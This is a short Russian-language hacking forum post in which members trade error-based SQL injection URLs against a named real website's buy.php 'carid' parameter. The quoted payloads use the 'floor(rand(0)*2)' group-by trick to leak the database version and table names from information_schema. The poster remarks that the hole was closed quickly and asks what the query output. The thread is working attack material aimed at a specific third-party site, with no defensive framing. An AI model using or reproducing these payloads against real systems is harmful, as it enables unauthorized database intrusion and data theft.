14.03.2012, 05:33
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
С нами:
8603990
Репутация:
0
|
|
Сообщение от faza02
http://wmrace.ru/buy.php?carid=3'+or+1+group+by+concat(version(),fl oor(rand(0)*2))+having+min(0)+or+1--+
как error-based крути.
upd:
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
Спасибо, жаль, не успел посмотреть, прикрыли, оперативно.
А что выводил этот запрос?
Сообщение от None
http://wmrace.ru/buy.php?carid=3'+and(select+1+from(select+count(*) ,concat((select+concat(table_name,0x00)+from+infor mation_schema.tables+limit+1,1),floor(rand(0)*2))x +from+information_schema.tables+group+by+x)a)--+
|
|
|